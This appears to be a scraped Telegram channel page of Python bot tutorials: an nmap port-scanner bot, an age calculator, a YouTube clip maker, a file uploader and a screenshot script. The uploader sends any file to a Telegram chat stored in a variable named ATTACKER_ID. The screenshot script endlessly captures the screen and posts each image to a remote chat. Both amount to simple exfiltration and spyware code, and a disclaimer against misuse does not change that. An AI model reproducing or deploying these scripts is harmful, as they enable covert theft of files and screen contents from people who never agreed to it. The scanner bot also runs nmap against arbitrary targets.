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#python_telegram_bot_source_codes
#python_Telegram_Bot
@python_telegram_bot_source_codes
Source will be shared Soon 😊
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Create a telegram bot to scan IP/host/websites (enter the IP and get the fastest open port report)
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
Create Telegram bot Scan.py:
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⚡️ First, install the necessary libraries:
⚡️ Create a file Filename.py
⚡️ Go to BotFather and create a new Telegram Bot
⚡️ Save the script as Filename.py Source
⚡️ Execute the 'Scan.py' script, and visit your Telegram bot, type '/start' to receive the welcome message.
⚡️ Pass the IP/host and get open ports, service and versions.
#nmap
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#python_Telegram_Bot
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
Create Telegram bot Scan.py:
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⚡️ First, install the necessary libraries:
$ pip install python-telegram-bot==13.7
$ pip install python-nmap
⚡️ Create a file Filename.py
⚡️ Go to BotFather and create a new Telegram Bot
⚡️ Save the script as Filename.py Source
import telegram
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import nmap
bot = telegram.Bot(token='YOUR_TOKEN')
updater = Updater('YOUR_TOKEN', use_context=True)
dispatcher = updater.dispatcher
nm = nmap.PortScanner()
def start(update, context):
context.bot.send_message(chat_id=update.effective_chat.id, text="Welcome there ! Please pass the IP or Host.")
def scan(update, context):
try:
target = update.message.text
nm.scan(hosts=target, arguments='-T4 -F')
scan_result = ''
for host in nm.all_hosts():
scan_result += f"Host: {host}\n"
for proto in nm[host].all_protocols():
ports = nm[host][proto].keys()
for port in ports:
port_info = nm[host][proto][port]
scan_result += f"Port: {port} State: {port_info['state']} Service: {port_info['name']}"
if 'product' in port_info:
scan_result += f", Version: {port_info['product']}"
scan_result += "\n"
context.bot.send_message(chat_id=update.effective_chat.id, text=scan_result)
except Exception as e:
context.bot.send_message(chat_id=update.effective_chat.id, text=f"Error: {str(e)}")
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
message_handler = MessageHandler(Filters.text & ~Filters.command, scan)
dispatcher.add_handler(message_handler)
updater.start_polling()
updater.idle()
⚡️ Execute the 'Scan.py' script, and visit your Telegram bot, type '/start' to receive the welcome message.
⚡️ Pass the IP/host and get open ports, service and versions.
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Develop a Python bot which can share any file seamlessly, without the necessity for port forwarding or delving into technical intricacies
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
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#uploadfiles
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NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
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import os
import sys
import telebot
# YOU CAN MODIFY
# BOT_TOKEN = 'MODIFY'
# GROUP_CHAT_ID = 'MODIFY'
# INSTALL PYTHON AND TELEBOT
BOT_TOKEN = 'MODIFY'
ATTACKER_ID = 'MODIFY'
bot = telebot.TeleBot(BOT_TOKEN)
def send_message(message):
bot.send_message(ATTACKER_ID, message)
def upload_file(file_path):
try:
file_name = os.path.basename(file_path)
with open(file_path, 'rb') as f:
bot.send_document(ATTACKER_ID, f, caption=f'File "{file_name}" uploaded successfully!')
except Exception as e:
send_message(f'Error uploading file: {str(e)}')
if len(sys.argv) != 2:
print("Usage: python upload.py <file_path>")
sys.exit(1)
file_path = sys.argv[1]
upload_file(file_path)
#uploadfiles
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Age calculator Telegram bot. This bot will tell you the detailed age and time duration you lived so far.
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
Create Telegram bot AgeCalculator.py:
⚡️ First, install the necessary libraries:
⚡️ Save the script as AgeCalculator.py
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⚡️ Execute the 'AgeCalculator.py' script, and visit your Telegram bot, type '/start' to receive the welcome message.
#agecalculator
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#python_Telegram_Bot
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
Create Telegram bot AgeCalculator.py:
⚡️ First, install the necessary libraries:
$ pip install python-telegram-bot
⚡️ Save the script as AgeCalculator.py
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import telegram
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import datetime
import time
TOKEN = 'YOUR_TELEGRAM_BOT_TOKEN'
def start(update, context):
update.message.reply_text("Welcome to EFXTV Age Calculator Bot!")
context.bot.send_message(chat_id=update.effective_chat.id, text="Please provide your date of birth in DD/MM/YYYY format?")
def get_dob(update, context):
dob = update.message.text
context.user_data['dob'] = dob
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text="Please provide your time of birth in HH:MM format?")
def get_tob(update, context):
tob = update.message.text
context.user_data['tob'] = tob
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text="Thank you. Please wait...")
time.sleep(1)
calculate_age(update, context)
def calculate_age(update, context):
try:
dob_str = context.user_data.get('dob')
tob_str = context.user_data.get('tob')
if not dob_str or not tob_str:
raise ValueError("Date of birth or time of birth is missing.")
dob = datetime.datetime.strptime(dob_str, '%d/%m/%Y')
tob = datetime.datetime.strptime(tob_str, '%H:%M')
now = datetime.datetime.now()
age = now - dob
total_hours = age.total_seconds() / 3600
total_minutes = age.total_seconds() / 60
total_seconds = age.total_seconds()
age_in_months = (now.year - dob.year) * 12 + now.month - dob.month
age_in_years = age_in_months // 12
remaining_months = age_in_months % 12
age_in_days = age.days
day_of_birth = dob.strftime("%A")
context.bot.send_message(chat_id=update.effective_chat.id, text=f"You have lived total hours: {total_hours:.2f}")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text=f"You have lived total minutes: {total_minutes:.2f}")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text=f"You have lived total seconds: {total_seconds:.2f}")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text=f"Your age in months: {age_in_months}")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text=f"Your age in years: {age_in_years}Y {remaining_months}M {age_in_days}D")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text=f"The day you were born on: {day_of_birth}")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text="Please follow us on @python_telegram_bot_source_codes")
time.sleep(1)
context.bot.send_message(chat_id=update.effective_chat.id, text="Kindly pass '/start' to start again")
except ValueError as e:
context.bot.send_message(chat_id=update.effective_chat.id, text=str(e))
finally:
context.user_data.clear()
updater = Updater(TOKEN, use_context=True)
dp = updater.dispatcher
dp.add_handler(CommandHandler("start", start))
dp.add_handler(MessageHandler(Filters.regex(r'^\d{2}/\d{2}/\d{4}$'), get_dob))
dp.add_handler(MessageHandler(Filters.regex(r'^\d{2}:\d{2}$'), get_tob))
dp.add_handler(MessageHandler(Filters.text & ~Filters.command, calculate_age))
updater.start_polling()
updater.idle()
⚡️ Execute the 'AgeCalculator.py' script, and visit your Telegram bot, type '/start' to receive the welcome message.
#agecalculator
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Take screenshot Using Python Telegram Bot
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
Create Telegram bot Screenshot.py:
⚡️ First, install the necessary libraries:
⚡️ Save the script as Screenshot.py
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⚡️ Execute the 'Screenshot.py' script, and visit your Telegram bot, type '/start' to receive files.
#Screenshot
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#python_Telegram_Bot
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
Create Telegram bot Screenshot.py:
⚡️ First, install the necessary libraries:
pip install pyautogui python-telegram-bot pillow
⚡️ Save the script as Screenshot.py
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import pyautogui
from PIL import Image
from io import BytesIO
from telegram import Bot
def take_screenshot():
screenshot = pyautogui.screenshot()
return screenshot
def send_screenshot(bot_token, chat_id, screenshot):
bot = Bot(token=bot_token)
with BytesIO() as bio:
screenshot.save(bio, format="PNG")
bio.seek(0)
bot.send_photo(chat_id=chat_id, photo=bio)
if __name__ == "__main__":
BOT_TOKEN = "ChangeMe"
CHAT_ID = "ChangeMe"
while True:
screenshot = take_screenshot()
send_screenshot(BOT_TOKEN, CHAT_ID, screenshot)
⚡️ Execute the 'Screenshot.py' script, and visit your Telegram bot, type '/start' to receive files.
#Screenshot
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Develop a Python bot which can create multiple YouTube Short videos for you.
NOTE: This post serves as a demonstration for creating a Python application. I do not endorse spamming or violating the terms or services of any individuals.
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Create Telegram bot YoutubeShorts.py:
⚡️ First, install the necessary libraries: Save file as requirements.txt
Run to install
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Create Telegram bot YoutubeShorts.py:
⚡️ First, install the necessary libraries: Save file as requirements.txt
pytube==11.0.0
moviepy==1.0.3
pyTelegramBotAPI==4.0.0
Run to install
pip install -r requirements.txt
import telebot
import re
from pytube import YouTube
from moviepy.editor import VideoFileClip
TOKEN = 'APITOCKEN_HERE'
bot = telebot.TeleBot(TOKEN)
@bot.message_handler(commands=['start'])
def send_welcome(message):
bot.reply_to(message, "Welcome! Send me a YouTube URL to get short clips. By t.me/efxtv")
@bot.message_handler(regexp=r'(https?://)?(www\.)?(youtube\.com|youtu\.be)/.+$')
def handle_youtube_url(message):
url = message.text.strip()
video_id = extract_video_id(url)
if video_id:
try:
video = YouTube(url)
clip_path = download_video(video)
duration = get_video_duration(clip_path)
timestamps = generate_timestamps(duration)
for start, end in timestamps:
short_clip_path = extract_clip(clip_path, start, end)
with open(short_clip_path, 'rb') as f:
bot.send_video(message.chat.id, f)
except Exception as e:
bot.reply_to(message, f"An error occurred: {e}")
else:
bot.reply_to(message, "Invalid YouTube URL")
def extract_video_id(url):
video_id_regex = r'(?:https?://)?(?:www\.)?(?:youtube\.com/watch\?v=|youtu\.be/)([a-zA-Z0-9_-]+)'
match = re.match(video_id_regex, url)
if match:
return match.group(1)
return None
def download_video(video):
stream = video.streams.get_highest_resolution()
return stream.download()
def get_video_duration(video_path):
clip = VideoFileClip(video_path)
duration = clip.duration
clip.close()
return duration
def generate_timestamps(duration):
timestamps = []
start = 0
while start < duration:
end = min(start + 30, duration)
timestamps.append((start, end))
start += 30
return timestamps
def extract_clip(video_path, start, end):
clip = VideoFileClip(video_path).subclip(start, end)
short_clip_path = f"clip_{start}_{end}.mp4"
clip.write_videofile(short_clip_path, codec='libx264')
return short_clip_path
bot.polling()
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